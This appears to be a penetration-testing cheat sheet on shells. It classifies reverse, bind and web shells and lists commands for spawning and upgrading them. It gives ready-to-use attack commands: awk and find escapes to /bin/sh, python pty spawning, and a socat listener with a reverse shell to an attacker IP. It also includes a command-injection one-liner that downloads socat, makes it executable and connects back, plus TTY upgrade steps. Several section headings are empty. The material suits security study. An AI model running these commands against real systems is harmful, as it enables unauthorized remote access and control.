Spawn a shell
All about shells
Shell Type | Description |
---|---|
Reverse shell | Initiates a connection back to a "listener" on our attack box. |
Bind shell | "Binds" to a specific port on the target host and waits for a connection from our attack box. |
Web shell | Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command). |
A web shell is a script written in a language that the web server executes, such as PHP. Web shells are not fully interactive.
Resources for upgrading simple shells
Sidenote: you can also generate a web shell with msfvenom.
Classification of shells
On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.
There are three main types of shell connections: reverse shells, bind shells, and web shells (see the table above).
Spawn a shell
awk
bash
# Upgrade a dumb shell to a full TTY: run these steps in order (they are separate commands, not one line)
SHELL=/bin/bash script -q /dev/null   # in the reverse shell: wrap bash in a pty
Ctrl-Z                                # background the reverse shell
stty raw -echo                        # on the attack box: stop the local terminal from echoing/processing keys
fg                                    # on the attack box: bring the reverse shell back to the foreground
reset                                 # in the reverse shell: reinitialise the terminal
xterm                                 # terminal type to enter if reset asks for one
find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
# This use of find searches for the file named after -name; for each match it executes /bin/awk with the same BEGIN { system("/bin/sh") } script discussed in the awk section, which launches a shell interpreter.
find . -exec /bin/sh \; -quit
# This use of find launches the shell interpreter directly via -exec and stops after the first match (-quit). If find matches nothing, no shell is spawned.
lua
msfvenom
You can generate a webshell by using msfvenom
msfvenom can also use Metasploit payloads under "cmd/unix" to generate one-liner bind or reverse shells. List options with:
perl
python
# Use python to spawn a pseudo-terminal (pty) around bash
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c "import pty;pty.spawn('/bin/bash')"
ruby
ssh
socat
# Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If socat isn't installed, other options exist. Standalone binaries can be downloaded from this GitHub repo: https://github.com/andrew-d/static-binaries
With a command injection vulnerability, it's possible to download the socat binary for the correct architecture to a writable directory, chmod it, and execute a reverse shell in one line:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
On Kali, run the listener shown above (socat file:`tty`,raw,echo=0 tcp-listen:4444) and you'll catch a fully interactive TTY session. It supports tab completion, SIGINT/SIGTSTP, vim, up-arrow history, etc. It's a full terminal.
stty options
# In the reverse shell: spawn a pty
$ python -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl-Z to background the reverse shell
# On Kali:
$ stty raw -echo
$ fg
# Back in the reverse shell:
reset
export SHELL=bash
export TERM=xterm-256color
# Run `stty size` in a local Kali terminal to read your rows and columns, then set the same size in the reverse shell:
stty size
stty rows <num> columns <cols>
# In one line (in the reverse shell):
reset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>
VIM
VIM escape:
Last update: 2024-10-24 Created: January 26, 2023 23:15:59